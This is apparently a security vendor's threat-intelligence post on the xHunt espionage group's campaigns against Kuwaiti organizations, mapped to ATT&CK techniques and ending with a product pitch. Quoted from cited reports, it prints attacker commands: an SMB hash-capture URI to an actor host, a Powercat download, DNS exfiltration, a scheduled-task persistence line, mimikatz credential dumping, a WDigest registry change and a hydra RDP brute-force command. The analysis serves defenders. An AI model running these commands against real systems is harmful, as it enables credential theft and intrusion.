.svg)
.svg)
xHunt APT: Cyber-Espionage Operations Targeting Kuwait and Exchange Servers
xHunt is a highly focused cyber-espionage group known for its persistent, multi-year campaigns targeting organizations in Kuwait. The group has demonstrated a specific interest in the shipping, transportation, and government sectors. First observed in July 2018 [1], xHunt's operations are characterized by the use of a custom, evolving toolkit, with many of its tools named after characters from the anime series "Hunter x Hunter", which is the origin of the group's name [2].
The group has demonstrated a broad capability to infiltrate organizations using diverse attack vectors, ranging from web-facing servers to targeted credential-harvesting operations. One of their most novel tactics involved a watering hole attack on a compromised Kuwaiti government website, where they injected a hidden HTML image tag pointing to an actor-controlled server. This was designed to passively harvest NTLM hashes from visitors by tricking their browsers into an authentication attempt. In other operations, the group has directly compromised Microsoft Exchange and IIS web servers, deploying a suite of custom backdoors. These include the BumbleBee webshell for direct command execution, and PowerShell backdoors like TriFive and Snugy (a CASHY200 variant) for persistent access. The group is notable for its creative command and control (C2) channels, such as those used by the Hisoka and TriFive backdoors, which leverage Exchange Web Services (EWS) to communicate by reading and writing email drafts within a compromised user's mailbox—specifically in the Drafts or Deleted Items folders.
This post reviews xHunt’s major historical operations, details its most significant intrusions against Kuwaiti organizations, and dissects the group’s tactics, techniques, and procedures to reveal how it executes disruptive cyber-espionage campaigns. In the end, we will show how Picus Platform helps defend against this group.
Simulate APT Attacks with 14-Day Free Trial of Picus Platform
History & Major Activities of xHunt Group
-
May–June 2019 – The group targeted transportation and shipping firms in Kuwait, deploying with backdoors named after anime characters, including "Hisoka", "Sakabota", "Netero", and "Killua" [2].
-
2019 - 2020 – xHunt actors compromised a Microsoft Exchange Server at a Kuwaiti organization and established persistence. In these campaigns, they deployed two new PowerShell-based backdoors, "TriFive" and "Snugy" (a variant of CASHY200), as well as a web shell called BumbleBee [3].
ATT&CK Mapping (TTPs) of xHunt Group
Tactic: Initial Access
T1189: Drive-by Compromise
The xHunt actor employed a patient, targeted watering hole attack to harvest credentials. The actor compromised a legitimate website belonging to a Kuwaiti government organization and injected a malicious HTML snippet. This code, which was hidden from visitors using the CSS style attribute visibility:hidden, created a reference to an external SMB share controlled by the actor using the file:// URI scheme [4].
|
file:///\\microsofte-update[.]com\c$\ |
When a user running Windows visited the compromised page, their browser would attempt to authenticate to this malicious remote share. This process automatically sends the user's NTLMv2 hash to the actor's server, allowing for its capture.
Tactic: Execution
T1047 Windows Management Instrumentation
The Sakabota cheat sheet includes a Windows Management Instrumentation Command-line (WMIC) example demonstrating how to execute a batch script located at c:\temp\a.bat using the process call create method with the given username and password [5].
T1059.001: Command and Scripting Interpreter: PowerShell
The group's primary backdoors, CASHY200, Snugy, and TriFive, are written entirely in PowerShell, leveraging its extensive capabilities for network communication and system interaction. These scripts are typically executed via scheduled tasks with commands designed to bypass the system's execution policy.
The actor also uses PowerShell for ancillary tasks, such as downloading additional tools. The Sakabota cheat sheet contains a one-liner to download Powercat from an actor-controlled server (hxxp://pasta58[.]com/pk.txt) and save it to the victim machine (c:\users\public\pc.ps1) [5].
T1059.003: Command and Scripting Interpreter: Windows Command Shell
The following snippet from a CASHY200 sample shows PowerShell invoking cmd.exe to run the ping command, which in turn generates the DNS queries to firewallsupports[.]com [6].
|
$domain = $rnd + $in + $id + $coun + $data + '.firewallsupports[.]com' |
Tactic: Persistence
T1053.005: Scheduled Task/Job: Scheduled Task
Scheduled tasks are the xHunt actor's preferred method for ensuring the persistence of their PowerShell backdoors. After deploying the TriFive (splwow64.ps1) and Snugy (OfficeIntegrator.ps1) scripts, the actor created scheduled tasks to execute them at regular five-minute and thirty-minute intervals, respectively. The commands below are scheduled [1]:
|
powershell -exec bypass -file C:\Users\Public\Libraries\OfficeIntegrator.ps1 |
In another case of installing a Snugy sample, xHunt used the following batch script to create and run a scheduled task named SystemDataProvider [1]:
schtasks /create /sc MINUTE /mo 5 /tn "\Microsoft\Windows\SideShow\SystemDataProvider" /tr "powershell -exec bypass -file C:\Windows\Temp\xpsrchvw.ps1" /ru SYSTEM & schtasks /run /tn "\Microsoft\Windows\SideShow\SystemDataProvider"
Tactic: Defense Evasion
T1003.001 OS Credential Dumping: LSASS Memory
Sakabota’s Passwords tab includes tools for extracting system credentials. The "MIMI" section lets the operator load a provided mimikatz binary and run it using the arguments log privilege::debug sekurlsa::logonpasswords exit [5]. This command reads LSASS memory and dumps authentication material from active logon sessions.
T1036.005 Masquerading: Match Legitimate Resource Name or Location
Scheduled tasks in an xHunt campaign were named ResolutionsHosts and ResolutionHosts and were placed in the c:\Windows\System32\Tasks\Microsoft\Windows\WDI directory. This was done to mimic the legitimate Windows Diagnostic Infrastructure task named ResolutionHost found in the same location, a clear attempt to evade detection by system administrators and forensic analysts [1].
T1112 Modify Registry
The xHunt actor proactively modifies system security settings to enable their tools to function effectively. The Sakabota cheat sheet includes a command to modify a registry key [5].
|
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f |
By setting the UseLogonCredential value to 1, this command forces Windows to store a copy of the user's plaintext password in the memory of the lsass.exe process. With this, attackers can circumvent a Mimikatz mitigation.
Tactic: Credential Access
T1110: Brute Force
While many of xHunt's techniques are stealthy, their playbook also includes noisy but potentially effective methods like brute-force attacks. The Sakabota cheat sheet contains a command for using thc-hydra [5], a popular password cracking tool, to brute-force logins for the Remote Desktop Protocol (RDP). The command below is a sample that can be used to brute-force RDP:
|
hydra -t 1 -V -f -l administrator -P passwords.txt rdp://<HOST> |
Tactic: Command and Control
T1071 Application Layer Protocol: Mail Protocols
TriFive backdoor gains access by logging into a legitimate user’s mailbox using credentials the actor had apparently stolen before installation. TriFive retrieves a PowerShell payload stored as an email draft in the Deleted Items folder and runs whatever code it finds there. Actors issue commands by creating a draft with the subject "555" whose message body is base64-encoded and encrypted; for example, woFyeWt3cw== decodes and decrypts to whoami. The script decodes the message, decrypts it by subtracting 10 from each character, then executes the resulting PowerShell with Invoke-Expression (iex). After execution, TriFive encrypts the command output by adding 10 to each character, base64-encodes the ciphertext, and saves it as a draft with the subject "555 s" in Deleted Items. An example returned body bQB5AHgAfgB5AH0AeQBmAGsAbgB3AHMAeABzAH0AfgB8AGsAfgB5AHwA decodes and decrypts to contoso\administrator [1].
T1572 Protocol Tunneling
The actor established SSH tunnels to interact with BumbleBee webshells on internal IIS web servers across three Kuwaiti organizations, none of which were directly internet-accessible. Commands executed through the BumbleBee webshells indicate use of PuTTY Link (Plink) to create tunnels into internal services. One tunnel targeted TCP port 3389, indicating Remote Desktop Protocol access, while others targeted TCP port 80 to reach internal IIS servers. The activity suggests the actor leveraged internal web applications’ file upload functionality on those IIS servers to deploy BumbleBee, facilitating lateral movement within the compromised networks [3].
T1665 Hide Infrastructure
The actor directly accessed a BumbleBee webshell on a compromised, internet-exposed Exchange server belonging to a Kuwaiti organization. Access was routed through Private Internet Access VPN infrastructure, with frequent switching between VPN servers to alter the apparent source IP in server logs. The activity was made to appear as originating from multiple countries, including Belgium, Germany, Ireland, Italy, Luxembourg, the Netherlands, Poland, Portugal, Sweden, and the United Kingdom. This pattern indicates deliberate efforts to obfuscate origin and complicate traceability [3].
How Picus Simulates xHunt Attacks?
We also strongly suggest simulating xHunt Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for xHunt:
|
Threat ID |
Threat Name |
Attack Module |
|
47076 |
xHunt Threat Group Campaign Malware Download Threat |
Network Infiltration |
|
98975 |
xHunt Threat Group Campaign Malware Email Threat |
Network Infiltration |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
Aliases of xHunt Group
xHunt is also known as: SectorD01, Hive0081, Cobalt Katana, Hunter Serpens.
References
[1] R. Falcone, "xHunt Campaign: Newly Discovered Backdoors Using Deleted Email Drafts and DNS Tunneling for Command and Control," Unit 42. Accessed: Oct. 22, 2025. [Online]. Available: https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/
[2] R. Falcone and B. Barbehenn, "xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations," Unit 42. Accessed: Oct. 22, 2025. [Online]. Available: https://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/
[3] R. Falcone, "xHunt Campaign: New BumbleBee Webshell and SSH Tunnels Used for Lateral Movement," Unit 42. Accessed: Oct. 22, 2025. [Online]. Available: https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/
[4] B. Barbehenn and R. Falcone, "xHunt Campaign: New Watering Hole Identified for Credential Harvesting," Unit 42. Accessed: Oct. 22, 2025. [Online]. Available: https://unit42.paloaltonetworks.com/xhunt-campaign-new-watering-hole-identified-for-credential-harvesting/
[5] R. Falcone, "xHunt Campaign: xHunt Actor’s Cheat Sheet," Unit 42. Accessed: Oct. 22, 2025. [Online]. Available: https://unit42.paloaltonetworks.com/xhunt-actors-cheat-sheet/
[6] R. Falcone and B. Barbehenn, "xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection," Unit 42. Accessed: Oct. 22, 2025. [Online]. Available: https://unit42.paloaltonetworks.com/more-xhunt-new-powershell-backdoor-blocked-through-dns-tunnel-detection/
